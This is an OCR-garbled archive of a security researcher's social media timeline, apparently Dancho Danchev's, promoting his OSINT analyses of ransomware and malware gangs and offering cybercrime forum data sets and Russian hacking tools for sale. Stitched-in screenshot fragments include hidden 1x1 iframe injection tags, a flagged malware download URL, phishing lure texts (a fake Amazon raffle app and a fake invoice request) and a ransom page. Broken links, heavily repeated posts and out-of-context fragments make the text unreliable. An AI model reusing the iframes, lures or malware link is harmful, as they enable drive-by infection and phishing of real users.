Money Mule Recruitment Scams Traced Down to Their 
Source Including Various Underground Market Propositions 
Exposed 
https://ddanchev.blogspot.com 
Dancho Danchev 

@vxunderground @ContiLeaks https://t.co/vSCjJG6FXyB 


23 *6 


05:47 

@noottrak @cedricpernet Psst! - https://t.co/vSCjG6FXyB Enjoy! 
05:48 

@ContiLeaks Here’s my analysis - https://t.co/vSCjJG6FXyB Enjoy! 
26 *19 

@BushidoToken My analysis - https://t.co/vSCjG6FXyB Enjoy! 
*3 

@AShukuhi My analysis - https://t.co/vSCjG6FXyB Enjoy! 

@GazTheJourno @BrianHonan My analysis - https://t.co/vSCjG6FXyB Enjoy! 


05:52 
@christogrozev @navalny My analysis - https://t.co/vSCjJG6FXyB Enjoy! 

This is me in @wikileaks - https://t.co/SRSIBRVJOh Cheers! 


05:53 


This is me in @Snowden archive - https://t.co/m3aJX6NLsm article - 
https://t.co/Lxt3ZC5M8w 

"The Cyber War Between #Russia and #Ukraine - An #OSINT Analysis" - 
https://t.co/tvPw6esTeM #OSINTUkraine https://t.co/n7O0hpVibqc 

[Screenshot: Disbalancer 0.7.2-main client window, status "Stopped", with Client ID, "Stats: Packets sent" and Tasks fields]

https://t.co/vSCjG6FXyB #ContiLeaks #ContiLeak https://t.co/RXavAk95Vv 

[Screenshot: Avaddon ransom page reading "Your network has been infected by Avaddon", with a "Time left" countdown and a demand to pay 0.1261769 BTC to recover files]

@HackingDave My analysis - https://t.co/vSCjJG6FXyB Enjoy! 
*3 
07:38 

@JBurnsKoven My analysis - https://t.co/vSCjG6FXyB Enjoy! 
*2 
07:50 

@threatpost @BrianHonan My analysis - https://t.co/vSCjG6FXyB Enjoy! 

09:13 


@John_Fokker @digihash @MISPProject @TrellixLabs @ChristiaanBeek @adulau My 
analysis - https://t.co/vSCjJG6FXyB Enjoy! 
09:14
@tiskimber My analysis - https://t.co/vSCjG6FXyB Enjoy!
10:15


@KimZetter My analysis - https://t.co/vSCjJG6FXyB Enjoy! 


10:16 


@albertzsigovits @VK_Intel @BushidoToken @malwrhunterteam @vxunderground 
@campuscodi @BleepinComputer @MalwareTechBlog @CharityW4CTI Source code 
for malicious software is a commodity! Check out my analysis here - 
https://t.co/vSCjJG6FXyB Enjoy! 


*1 
10:16 


@EmCEllis Awesome! Thanks for the comment! 


*1 
RT @whoisxmlapi: #VoidBalaur gang has been launching #typosquatting &
spear #phishing attacks worldwide.

WXA researcher @dancho_danchev do...


2 - Wednesday 


00:57 
@briankrebs My analysis - https://t.co/vSCjJG6FXyB Enjoy! 
Post updated - "Exposing the #Conti #Ransomware Gang - An #OSINT Analysis" -
https://t.co/vSCjG6FXyB https://t.co/kmpchBWnwj 
https://t.co/vSCjG6FXyB https://t.co/cUktcmD7eB
RT @EmCEllis: Really interesting data collection from the #ContiLeak from
@dancho_danchev’s Blog - Mind Streams of Information Security K...
10:34
@evacide My analysis - https://t.co/vSCjG6FXyB Enjoy! 


4 - Friday 


08:47 
https://t.co/LoqCAQ5Qbl 
09:06


"Exposing the #Trickbot #Malware Gang - An #OSINT Analysis" - 
https://t.co/loqCAQ5Qbl https://t.co/k7xDWRAr60 


*1 
The code execution cannot proceed because MSVCR100D.dll
was not found. Reinstalling the program may fix this problem.
09:06 
"Exposing the #Trickbot #Malware Gang - An #OSINT Analysis" - 
https://t.co/loqCAQ5QbI https://t.co/tOFPfzluFi 
09:06 
"Exposing the #Trickbot #Malware Gang - An #OSINT Analysis" - 
https://t.co/loqCAQ5Qbl https://t.co/eyNcmiBdl9 
"Exposing the #Trickbot #Malware Gang - An #OSINT Analysis" -
https://t.co/logCAQ5Qbl https://t.co/r4v8Q3FduZ 


[Screenshot: browser developer tools console showing repeated "Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource" warnings (Reason: CORS request did not succeed) for socket.io polling requests to an .onion host on ports 6001 and 6002.]
https://t.co/LoqCAQ5QbI https://t.co/6qUWtSfztG


09:07 
"Exposing the #Trickbot #Malware Gang - An #OSINT Analysis" - 
https://t.co/LoqCAQ5QbI https://t.co/Jvb1IEj84K 
09:07 
"Exposing the #Trickbot #Malware Gang - An #OSINT Analysis" - 
https://t.co/LoqCAQ5QbI https://t.co/jEGup7vVWh 
"Exposing the #Trickbot #Malware Gang - An #OSINT Analysis" -
https://t.co/loqCAQ5QbI https://t.co/Nplo4nwNxh
"Exposing the #Trickbot #Malware Gang - An #OSINT Analysis" -
https://t.co/loqgCAQ5Qbi https://t.co/ewO3Tfirbt


RunDLL

There was a problem starting C:\Users\user\Downloads\1\dl2.dll

The specified module could not be found.


"Exposing the #Trickbot #Malware Gang - An #OSINT Analysis" - 
https://t.co/logCAQ5QbI https://t.co/m3JLfuoGEi 


cmd.exe - Application Error

The application was unable to start correctly (0xc0000005).
Click OK to close the application.


"Exposing the #Trickbot #Malware Gang - An #OSINT Analysis" - 
https://t.co/logCAQ5Qbl https://t.co/4ntACvulKx 


09:08 


09:08 


09:08 


The program or feature "\??\C:\Users\TST7x04\AppData\Local\Temp\C8FC.exe"
cannot start or run due to incompatibility with 64-bit versions of Windows. Please
contact the software vendor to ask if a 64-bit Windows compatible version is
available.


"Exposing the #Trickbot #Malware Gang - An #OSINT Analysis" - 
https://t.co/loqcCAQ5QbI https://t.co/Vod7YqUIxb 


Failed - Virus detected

greenmountains.ae/Do%D1%81ument_Pr%D0%B5view.exe
23:07 


Do you know someone who needs a 100GB raw HTML of public Russian cybercrime
forums data set for research purposes? The price is $500. Let me know if you’re
interested or in case you know someone and I would be happy to send a sample if
necessary. https://t.co/EDWAqDxtuO
5 - Saturday


03:47 


My RSS feed - https://t.co/2VRBr24Ya9 #security #cybercrime #malware 
#cyberattacks #CyberAttack #cyberwar #Threatintel #ThreatHunting #threatreport 
https://t.co/mEdkYISLWI 


10:09 


I need a major client or #Threatintelligence or #ThreatHunting teams for my
https://t.co/WIBGTU5ryT project. I can deliver you the raw and enriched IoCs in-depth
perspectives and I can do it in bulk on a daily basis. I can offer bulk account
discounts. https://t.co/DINUxKqxm0
19:36


Check this out! https://t.co/qOxgOMRRFz 




19:37 
Check this out! https://t.co/E6bkT9ICNU 




19:38 


19:38 
Check this out! https://t.co/4aBdJq7b4l


Check this out! https://t.co/jmISMqWwYdxX 




7 - Monday 


07:31 


Who needs a 5GB of Russian hacking tools for research purposes? Price is $500. 
Direct archive download possible. Ping me in case you’re interested. Regards. 
Dancho 


07:33 


I’m also offering 100GB of Russian cybercrime forums archive for research purposes. 
Price is $500. Direct download possible as well. Ping me in case you’re interested. 
Regards. Dancho 
"Exposing the Conti Ransomware Gang - An OSINT Analysis" -
[Screenshot: console output of a file upload tool. WinSock and I/O completion port initialized, server connected, then periodic "Stats" lines reporting file count, total size, read speed, compression ratio and upload speed.]
Amazon 30th Anniversary Celebration
Amazon's 30th Anniversary Celebration is coming to an end.
Today is the last stage of the raffle for a USD 10-200 gift card and other prizes
To participate in the raffle, you need to download the Lottery App and generate a unique code
How to take part in the raffle?
2. Run the application. The application will generate a code to participate in the lottery
Enter the code in the text field below
Apple
Hello!

We are asking for your help. Please check the information in the generated
invoice I provide. Your email provider rejects a letter with attachments.

Provide all the related information as soon as you can.
#cyberattacks #CyberSec #Threatintel #ThreatHunting #Threatintelligence
#threatreport https://t.co/nshwyFLHQp 
"Exposing the Conti Ransomware Gang - An OSINT Analysis" -
https://t.co/vSCjG6FXyB #security #cybercrime #malware #CyberAttack
#cyberattacks #CyberSec #Threatintel #ThreatHunting #Threatintelligence
#threatreport https://t.co/T60waLR3Ex
SQLSTATE[42S22]: Column not found: 1054 Unknown column 'api_token' in 'field list'

Illuminate\Database\QueryException
Doctrine\DBAL\Driver\PDOException
PDOException
PDO prepare
Response Headers

Cache-Control: no-cache, private
Connection: Keep-Alive
Content-Length: 2
Content-Type: application/json
Date: Mon, 29 Jun 2020 13:55:53 GMT
Keep-Alive: timeout=5, max=100
Server: Apache/2.4.2 (Win64) PHP/7.3.13 OpenSSL/1.0.1c
X-Powered-By: PHP/7.3.13
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 59

Request Headers

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Host: a3gqqjhcskbjg36bx.onion
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
The code execution cannot proceed because MSVCPXO.all was
not found. Reinstalling the program may fix this problem.
#threatreport https://t.co/5tn3artqyy 
#Threatintel #ThreatHunting #Threatintelligence #threatreport
https://t.co/gRKtwVfSEZ 
10 - Thursday


19:41 


https://t.co/WIBGTU5ryT RT please! #security #cybercrime #malware 
#CyberSecurity #CyberAttack #Threatintelligence #Threatintel #ThreatHunting 
#threatreport https://t.co/NPEYmxKYN3 
14 - Monday


15:38 
Courtesy of me! CC: @Cryptome_org https://t.co/a7Dovo7MdB 
Image 6 : NCW Attack Formation


15 - Tuesday 


09:56 


Exposing #Bulgaria’s Involvement in Cold War Espionage - Who Stole the PC and 
Build a Fake Pro-Western Empire? - An #OSINT Analysis - https://t.co/BYBIgNoM9y 
Exposing #Bulgaria - Or Who Build the Soviet Union’s Virus Factories in the 90’s? -
An #OSINT Analysis - https://t.co/5R8OCWkJMS
Subscribe to Dancho Danchev’s Newsletter, by @dancho_danchev
https://t.co/vSyNCsr5g4


19 - Saturday 
01:16


We have a new blog on Hybrid Warfare at https://t.co/fnswrm8KWP - the original 
search engine for hackers circa 1994 which you can access here - 
https://t.co/Gf9CXdOpa|I including the first post here - https://t.co/GuMftgJfsa Enjoy! 
Cheers! https://t.co/3sWSurgBq7
Cheers! https://t.co/AOG2B8dQUc
20 - Sunday
01:55 


Anyone hiring journalists or freelance writers? 
07:31 


Did you know that #Bulgaria stole the PC from the U.S and built a fake Pro-Western
Empire courtesy of Bulgaria’s Durzhavna Sigurnost under the COCOM embargo?
Awesome! https://t.co/3z9ksCH1d1 [PDF] guess who uploaded the archive to
@Cryptome_org? I did! https://t.co/FihhxycSH6
07:32


Did you know that back in the day I used to possess a Pravetz 16 PC which was
basically an IBM clone? I used to visit https://t.co/rmXzey30Go on a daily basis using
my own modem which was quite a privilege back in the day. Stay tuned!

07:32 


Exposing #Bulgaria’s Involvement in Cold War Espionage - Who Stole the PC and 
Build a Fake Pro-Western Empire? - An OSINT Analysis - https://t.co/YEOWIAtXjT 
https://t.co/VXjayPYSXn 




07:32 
Exposing #Bulgaria’s "Durzhavna Sigurnost" - The Complete Technical and Scientific 
Collection Archive During the Cold War - An OSINT Analysis - https://t.co/qBbOI3zR5f 
07:33 
Exposing the "KGB Hack" a.k.a Operation EQUALIZER - An OSINT Analysis - 
https://t.co/KDPYiIEKDQQ 
07:33 
Exposing #Bulgaria - Or Who Build the Soviet Union’s Virus Factories in the 90’s? - An 
OSINT Analysis - https://t.co/c9XGjM3iaO 
07:36 


Looking for a true marvelous true and inspiring story on how I did not steal the PC
and didn’t build a fake Pro-Western empire? Check out memoir here -
https://t.co/qLxz4GuRip [PDF] including my "inside story" here -
https://t.co/kyl5GvScSi #Bulgaria


07:52 


RT @juliocesarfort: @roman_soft @_alt3kx_ it’s just Dancho Danchev trying to make 
a comeback after years out of the spotlight and battling... 
07:57


A group of people gathered once upon a time without them knowing and started
building and working on something big and new. I was alone thinking that once you
walk in a forest and meet a tree they’re usually two ways around it. I took the
undertaken one.


07:59 


The only single quote that I’ve ever read in my entire lifetime - "What use are they? 
They’ve got over 40,000 people over there reading newspapers" - 
https://t.co/tyuzOS5z0g [PDF] Awesome! Awesome! Thanks a lot for the career 
achievements. 


08:03 


This is the second quote I’ve ever read in my entire lifetime - "Communications 
without intelligence is noise. Intelligence without communications is irrelevant." 
Network centric warfare is everywhere! Embrace it! https://t.co/CbnyL6Uuh5 


08:03 
The nukes are coming! The nukes are coming! - https://t.co/2Ib2FFXYN7 #Bulgaria 


10:41 


New Twitter Profile Photo! Who’s on Facebook? - https://t.co/AIXOA6DHVy 
https://t.co/lOd7ONU8VK 
22 - Tuesday


00:10 


https://t.co/uvAt5gK9BA https://t.co/JFGypCdiLm 

00:10 
https://t.co/uUvAt5gK9BA https://t.co/7jIDeoYwwD 


03:10 


https://t.co/uvAt5gK9BA #security #cybercrime #malware #Threatintelligence 
#Threatintel #threatreport https://t.co/d9fPcsC2LK 


04:57 


Anyone who wants to invite me to present at their security event virtually? 


04:57 
Any private mailing lists or invite-only security communities that you want to invite 
me to? 
05:00 
Have you taken the time to go through my 100 pages memoir? The story is not over
yet so stay tuned. Here’s PDF link in multiple E-Book readers formats -
https://t.co/WeZmxLgin2 for free! Share your feedback please and stay tuned for the
second edition!




05:01 


Are you interested in reading all of my research in multiple E-book reader formats? 
For free? I’ve archived everything at the Internet Archive here - 
https://t.co/UZ6qVANXxVF grab a copy today and stay tuned for more! 


05:14 
Who wants to know me better? Check out this video - https://t.co/DHoD9j26nY and 
stay tuned for more. 
05:15 


This is a second video which I recently did on the InFraud Cybercrime Organization in
a demonstration with Maltego - https://t.co/k8QSmgWHZ29 stay tuned for more.


*1 
05:16 
This is a third video which I recently did where I teach and practice how to catch and
profile FBI’s Most Wanted Cybercriminals using OSINT and my methodology -
https://t.co/n8K5tSJAfR stay tuned for more.


*1 
05:18 
We have a new blog at https://t.co/PetnTEMIL3 which you can find here -
https://t.co/Gf9CXdOpq} including the first post which you can find here -
https://t.co/GuMftgJfsa stay tuned for more.


05:22 


@k8em0 @ciaranmartinoxf I’m seeing the usual iFrame based crowd-sourced HTTP 
get flooders including a Windows based application courtesy of a company which is 
offering help to Ukraine and building hit lists of Russian Government Web sites. 
Here’s an analysis - https://t.co/tvPw6es TeM 


*1 
07:31 


Who's online and what are you doing in terms of cybercrime research and threat 
intelligence gathering? 


*2 
07:34 


Ransomware or who cares? - https://t.co/Pj15rxfLTZ also check out my "Malware -
Future Trends" paper circa 2006 where I somehow anticipated the rise of cryptoviral
extortion which was a buzz word at the time - https://t.co/dZZINmGYu8

07:40 
Did you know? I made it to Slashdot two times. Here - https://t.co/ogWebSViBO in
2006 and here - https://t.co/x65aFCQdSd in 2011.




07:42 


Surprise! Who wants full offline copy of my personal blog in various E-Book formats 
for free? Check out the Internet Archive here - https://t.co/JT676NfPZI and don’t 
forget to go through all the Web 2.0 buzz including all the censorship content. 
https://t.co/wEUSgsqRdF 




07:44 
@CryptoThn How exactly are you tracking them? Using public sources or using 
another methodology? Dare to share the details? 
07:49 


Did you know that I used to run https://t.co/Xest1SInvx during 2003-2006? In case
you're interested in a copy of the Security Newsletter grab it from the Internet
Archive here - https://t.co/PGLUftNfUs best wishes to everyone from Team Astalavista
https://t.co/XvULyO3IMp


07:53 


Did you know that I used to be into Information Security once which is how I actually
got into the security industry as a hacker enthusiast during my teenage and student
years? This is one of my first white papers - https://t.co/V1Ee3jryGx


07:55 
This is me on cyber warfare - https://t.co/utsrBhju8W enjoy! 


07:56 


Interested in going through some of my presentations? Here’s the actual archive - 
https://t.co/nNsXMPrGi0O 


07:57 


Here’s my Keynote on Koobface from @CybercampEs 2016 - https://t.co/q5iTxLwmK1 
enjoy! 


23 - Wednesday 


01:21 
New research courtesy of me for @whoisxmlapi - https://t.co/100jzZDTvq enjoy! 


01:22 


Remember the infamous Innovative Marketing scareware distributor? Check out my 
latest research for @whoisxmlapi on the topic here - https://t.co/SLtOGhInxK enjoy! 


01:23 


Here’s also a podcast which I did for @whoisxmlapi on mapping the bad guy’s
malicious infrastructure which you can check here - https://t.co/39JWq7V8Md enjoy
and stay tuned for more


01:25 


Check out my "Cyber Intelligence" memoir here - https://t.co/WeZmxLgin2 available 
in multiple E-Book reader formats and stay tuned for more 
01:28


Cheers to @securityblvd for referencing my "Who is Dancho Danchev?" post here - 
https://t.co/cJ1P3g5rdn which can be also described as a case study on how to build 
an information security industry "at home". Stay tuned for more. 
https://t.co/uugSV3gAI8 


01:33 


Interested in knowing more about my career experience as a hacker enthusiast 
during the 90’s up to present day? Check out my "The Inside Story Behind the Life of 
ex-Bulgarian Hacker Dancho Danchev" Medium article here - https://t.co/kyI5GvScSi 
and stay tuned 
08:19 


@NCbassey I can do security blogging.




24 - Thursday 


08:03 


08:04 


https://t.co/JTcqOaYgET https://t.co/ik7hle2J8E 
https://t.co/JTcqOaYgET https://t.co/AOO0hx1fGoz


08:05 


https://t.co/JTcqOaYgET https://t.co/o8h4jBwcVc 
08:05


https://t.co/JTcqOaYgET https://t.co/fopulv5vxY
08:05


https://t.co/JTcqOaYgET https://t.co/SxaThTUdCG
08:06


https://t.co/JTcqOaYgET https://t.co/mrilkDasFMM
08:06


https://t.co/JTcqOaYgET https://t.co/AatrCdwEth


08:07 


https://t.co/JTIcqOaYgET https://t.co/dHeeQolIndc 


08:08 


https://t.co/JTcqOaYgET https://t.co/Ss1VqHe]JJN 
08:08


https://t.co/JTcqOaYgET https://t.co/2DnmmZHQai
08:09


https://t.co/JTcqOaYgET https://t.co/frlU3ONtXN
08:10


https://t.co/JTcqOaYgET https://t.co/YMH36wJWhR
08:10
https://t.co/JTcqOaYgET https://t.co/655N9eGkVk
08:10


https://t.co/JTcqOaYgET https://t.co/vVimPvaZMD 


08:10 


https://t.co/JTcqOaYgET https://t.co/2ThAtduKpG 




08:10 


https://t.co/JTcqOaYgET https://t.co/a4GPIFLeil 
08:11


https://t.co/JTcqOaYgET https://t.co/WpPFax5DvC
08:11


https://t.co/JTcqOaYgET https://t.co/oltpiZpnLj
08:11


https://t.co/JTcqOaYgET https://t.co/3X7JG42y]F


08:11 


https://t.co/JTcqOaYgET https://t.co/FPErkpixSwW 
26 - Saturday


03:48 


https://t.co/uvAt5gK9BA #security #cybercrime #malware #CyberAttack 
#CyberSecurity #cyberattacks #cyberwar #cybersecuritytips #Threatintel 
#Threatintelligence #ThreatHunting #threatreport https://t.co/42658l4mkD 
28 - Monday


00:44 


Who wants to really work with me? Are you a vendor or an organization that wants to 
acquire my public STIX/STIX2/TAXII feed - https://t.co/OmUajr8DT8 and have me 
populate it with research on a daily basis? Drop me a line. Brochure - 
https://t.co/sElhv2bb8t https://t.co/KCL3MB3TeD 


*1 
30 - Wednesday


10:14 

Does anyone know anyone at the Organized Crime and Corruption Reporting Project 
@occrp and can anyone do an introduction? 

11:32 


My new Twitter BIO - "Independent Contractor. https://t.co/Xest1SInvx (2003-2006) - 
Slashdotted Two Times - Ex-@ZDNet - Ex-@Webroot - Won Jessy H. Neal Award - Won 
@SCMagazine Award" always "bother" me at https://t.co/JTcqOaYgET 
https://t.co/Kqrfh27Ddm 
12:09


Aggregate Item Use (all time)

Wednesday, December 14, 2005 — Saturday, September 14, 2019

2,572,020 Views of 1038 items

6,497,440 Clicks back to the site on 1217 items


Thanks @Geraldanthro for all the assistance in tracking me down and actually finding
me back in 2011! It’s always a pleasure to know that you’ve followed and I hope that
you’re still following my work and research. Best wishes and keep up the good work!


31 - Thursday 


03:28 


https://t.co/dS5vVv6AmyYr 


https://t.co/HBrH9ck2qD https://t.co/UGMQUJ9qfxX 


11:34
Thanks @teamcymru for following me! Regards. Dancho 


April 


4 - Monday 


20:16 


Who wants to write a book with me? Drop me a line at dancho.danchev@hush.com 
#security #cybercrime #malware #CyberSecurity #CyberAttack #Threatintel 
#Threatintelligence #ThreatProtection #threatreport 


21 *%2 


6 - Wednesday 


18:45 
https://t.co/OmUajr8DT8 https://t.co/GFaj9VtbyZ 
18:45


https://t.co/OmUajr8DT8 https://t.co/kqmXCXLZdh 


18:45 
https://t.co/OmUajr8DT8 https://t.co/Xdw6lv7FoP 


18:46 


https://t.co/OmUajr8DT8 https://t.co/CkAmafhQQW 
18:46


18:46 


[Screenshot of a STIX2 feed listing; the legible entry titles are truncated, among them repeated “A Diverse Portfolio of Fake Secu...” items.]


https://t.co/OmUajr8DT8 https://t.co/afuYCsa5ok 


https://t.co/OmUajr8DT8 https://t.co/oZ2jfqJgEl 
18:46
https://t.co/OmUajr8DT8 https://t.co/yp9QUZhcRd


18:47 


We Cover the Following Threat Intelligence Feed Categories Historically and in Real-Time


- The Russian Business Network Coverage — Complete Qualitative and Incident and Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands of IoCs (Indicators of Compromise) and MD5s

- Cyber Jihad Online Activities Coverage — Complete Qualitative and Incident and Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands of IoCs (Indicators of Compromise) and MD5s

- Proliferation of DIY Hacking Tools Coverage — Complete Qualitative and Incident and Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands of IoCs (Indicators of Compromise) and MD5s

- The Rise of Rogue Antivirus Software Coverage — Complete Qualitative and Incident and Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands of IoCs (Indicators of Compromise) and MD5s

- Cybercrime DIY Tools and Artifacts Coverage — Complete Qualitative and Incident and Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands of IoCs (Indicators of Compromise) and MD5s

- Web Malware Exploitation Kits Incidents and Campaigns — Complete Qualitative and Incident and Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands of IoCs (Indicators of Compromise) and MD5s

- Blackhat SEO Campaigns and Incidents — Complete Qualitative and Incident and Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands of IoCs (Indicators of Compromise) and MD5s

- Embedded Malware Campaigns and Incidents — Complete Qualitative and Incident and Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands of IoCs (Indicators of Compromise) and MD5s


https://t.co/OmUajr8DT8 https://t.co/8BnmeZEu9n4 
18:47
https://t.co/OmUajr8DT8 https://t.co/UOOpRbAeiH


9 - Saturday


01:11 


https://t.co/waW3ZbhZjE - Community for Information, Computer and Network Security #Bulgaria https://t.co/50IhrGt53i
21:27


21:27 


21:28 


21:29 


21:30 


21:30 


21:30 


21:31 


21:31 


21:31 
Virtual Forum for Information, Computer and Network Security


Discussions on malicious code, software bugs, programs, courses and resources for information, computer and network security


https://sigurnost.bg 


https://t.co/8pw8alG6QA 


https://t.co/I2Id1pjOU5 


https://t.co/afUOhgH7dO 


https://t.co/b9pjOCHvUe 


https://t.co/nEP8dzsfif 


https://t.co/DG8oga3lpo 


https://t.co/8BOZRbPnD3N 


https://t.co/AvBqVjHYE7 


https://t.co/167MOpviF 


https://t.co/R8dKhrQWX6 


21:32 
https://t.co/aTVOIgB3Gr 


21:32
https://t.co/QfuLP273E9 
21:32 
https://t.co/NfVf7 DQaRH 
21:33
https://t.co/PVFrADkGwX 
21:36 
https://t.co/waW3ZbhZjE https://t.co/2uwvijbxp2 
Virtual Forum for Information, Computer and Network Security
Discussions on malicious code, software bugs, programs, courses and resources for information, computer and network security
https://sigurnost.bg 
10 - Sunday 
07:20 
https://t.co/8kadUyEttk 
07:58 


Guys and girls. Who wants to hire a security blogger? CV here - 
https://t.co/O4zpbx2RSb @ZDNet Zero Day portfolio here - https://t.co/3vqmctZzHf 
@Webroot portfolio here - https://t.co/tW2LuSxdSi [PDF] RT pls! Ping me here! 


08:01 
I'm "desperately" looking for the opportunity to come back on the scene as a security
blogger and anything that you can offer as a direct hire proposition would be greatly
appreciated. Here’s my portfolio - https://t.co/UZ6qVANXVFE RT pls!


08:04 


I can also do security and investigative reporting and anything that you could offer
for this position would be greatly appreciated. Feel free to go through the archives
here - https://t.co/JTcqOaYgET or check out my Onion here - https://t.co/4CqIL2cSeH
https://t.co/EPN3inpoaE


08:18 
My Dark Web Onion - https://t.co/4CqIL2cSeH so far so good! https://t.co/rLlaoevaDmu 
U.S Intelligence Community 2.0


RECENT POSTS


Intell on the Criminal Underground - Who’s Who in Cyber Crime for 2007?


<iframe src=./n404-1.htm width=1 height=1 > </iframe>
<iframe src=./n404-2.htm width=1 height=1 > </iframe>
<iframe src=./n404-3.htm width=1 height=1 > </iframe>


RECENT COMMENTS 


15 - Friday 


10:09 
Doing book promotion. https://t.co/GM3JMWhhOw 
https://t.co/uvAt5gK9BA https://t.co/t1BN5yo2le
https://t.co/OmUajr8DT8 https://t.co/cCIL9Fpd1L




00:28 
https://t.co/OmUajr8DT8 https://t.co/lynROw1FSP 


00:29 


https://t.co/OmUajr8DT8 https://t.co/hjwGolmjCe 


00:29 
https://t.co/OmUajr8DT8 https://t.co/O4MFFWsTgy 
18 - Monday


22:17 


https://t.co/HBrH9ck2qD #security #cybercrime #malware #CyberAttack 
#cybersecuritytips #CyberSec #cyberwar #CyberSecurityAwareness 
#Threatintelligence https://t.co/ZUtujrQm25 
01:50
https://t.co/uvAt5gK9BA https://t.co/zPSxbsDY1n 
01:51 


https://t.co/uvAt5gK9BA https://t.co/oDOHBOBMrA 
07:22


INTRODUCING BOX.SK’S - “HOW TO GET IN TOUCH WITH THE KGB — THE DEFINITE HACKER’S MANUAL” ONLINE MANUAL


admin 3 months ago


https://t.co/uvAt5gK9BA https://t.co/ixS6ICS9id 
Keeping it cool! https://t.co/OmUajr8DT8 https://t.co/loXoP8kcHv




02:10 
Keeping it cool! https://t.co/OmUajr8DT8 https://t.co/WAGB1sDseY 
Keeping it cool! https://t.co/OmUajr8DT8 https://t.co/Ycupg!lQQbl
Keeping it cool! https://t.co/OmUajqR2uy https://t.co/ezLqloFSQi
No audio. Who wants API key here? https://t.co/OmUajr8DT8 https://t.co/odrCHXRO6R




23 - Saturday 


07:37 


Dear friends and colleagues. Who wants to socialize here with me? Post a comment
and say "hi" or "keep up the good work" and it would be greatly appreciated. Check
out https://t.co/JTcqOaYgET including my Dark Web Onion - https://t.co/HBrH9ck2qD
stay tuned! https://t.co/lIOgZ82|19qb
24 - Sunday


02:13


Second Premium Interactive Edition of my "Cyber Intelligence" memoir is on its way. 
Wish me luck! There will be a lot of interactive content in terms of audio and video 
material and I’m also taking a summer break! Happy Easter and Happy Summer! 

https://t.co/QrRDtjsjJM 
*4 


02:14 


Second image in a row. My savings go here. I’m looking for a place to crash during
the holidays. Wish me luck and stay tuned for the Second Premium Interactive
Edition of my "Cyber Intelligence" memoir. Happy holidays! https://t.co/uf2TKgHU5h
*1 


02:15 


Outfit ready! See you after the holidays and stay tuned! Happy Holidays! 
https://t.co/KN2T9eBVCg 
2 - Monday


23:05 
My latest white paper courtesy of me for @whoisxmlapi - https://t.co/xs8XDutSVp 
grab a copy today! 
23:06 


My second white paper courtesy of me for @whoisxmlapi - https://t.co/oDOWGP22dk 
grab a copy today! 


4 - Wednesday 


20:31 


My third white paper courtesy of me for @whoisxmlapi - https://t.co/LubITAHTAQ grab 
a copy today! 
5 - Thursday


04:56 


Folks. Guys and girls. Who wants access to my 77GB and counting Cybercrime Forum
Data Set for 2022? Drop me a line at dancho.danchev@hush.com and I would be
happy to offer access for research purposes. Regards. Dancho
https://t.co/oX7KbADYbm


Folks. Guys and girls. Who wants access to my 77GB and counting Cybercrime Forum
Data Set for 2022? Drop me a line at dancho.danchev@hush.com and I would be
happy to offer access for research purposes. Regards. Dancho
https://t.co/OwgdVfLOnn


Folks. Guys and girls. Who wants access to my 77GB and counting Cybercrime Forum
Data Set for 2022? Drop me a line at dancho.danchev@hush.com and I would be
happy to offer access for research purposes. Regards. Dancho
https://t.co/OhsvxTNolk


04:57
Folks. Guys and girls. Who wants access to my 77GB and counting Cybercrime Forum
Data Set for 2022? Drop me a line at dancho.danchev@hush.com and I would be
happy to offer access for research purposes. Regards. Dancho
https://t.co/50AkncWz47


04:58
Folks. Guys and girls. Who wants access to my 77GB and counting Cybercrime Forum
Data Set for 2022? Drop me a line at dancho.danchev@hush.com and I would be
happy to offer access for research purposes. Regards. Dancho
https://t.co/uWuq1t9DYZ


04:58
Folks. Guys and girls. Who wants access to my 77GB and counting Cybercrime Forum
Data Set for 2022? Drop me a line at dancho.danchev@hush.com and I would be
happy to offer access for research purposes. Regards. Dancho
https://t.co/M2HInOOCZT


04:58
Folks. Guys and girls. Who wants access to my 77GB and counting Cybercrime Forum
Data Set for 2022? Drop me a line at dancho.danchev@hush.com and I would be
happy to offer access for research purposes. Regards. Dancho
https://t.co/PRHB5HDd7n


7 - Saturday 
02:51 
My Dark Web Onion - https://t.co/cQq40tVcwD https://t.co/KBQqcGNdpk 
                        Visitors   Visits
Today:                  1          27
Yesterday:              1          5,262
Last 7 Days (Week):     8          38,656
Last 30 Days (Month):   31         142,408
Last 365 Days (Year):   319        330,408
Total:                  319        330,408


07:30 


https://t.co/qLxz4GuRip #security #cybercrime #malware #CyberSecurity 
#cybersecuritytips #cyberwar #CyberSec #CyberHunter #threathunting 
#Threatintelligence #threatintel https://t.co/nNQtqtTNkZ 


Cyber 


Intelligence 


The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchev 
The RBN, The Koobface Botnet, The Rock Phish Gang, 
Spam Phishing and Malware Campaigns Including Botnet 
and Money Mule Recruitment Scams Traced Down to Their 


Source Including Various Underground Market Propositions 
Exposed 


https://ddanchev.blogspot.com 


Dancho Danchev 


18:55 


https://t.co/H7zZRZUNCZq #security #cybercrime #malware #CyberSecurity 
#cybersecuritytips #cyberattacks #CybersecurityNews #threathunting 
#Threatintelligence #threatintel 


19:18 


https://t.co/gej8f4CWpN #security #cybercrime #malware #CyberSecurity 
#cybersecuritytips #cyberattacks #CybersecurityNews #threathunting 
#Threatintelligence #threatintel 
8 - Sunday


05:45 


https://t.co/AGB]d8eCtX #security #cybercrime #malware #CyberAttack 
#CyberSecurity #cybersecuritytips #CyberSec #cyberattacks #ThreatIntelligence 
#threathunting #threatintel https://t.co/LRTy5XEG3g 


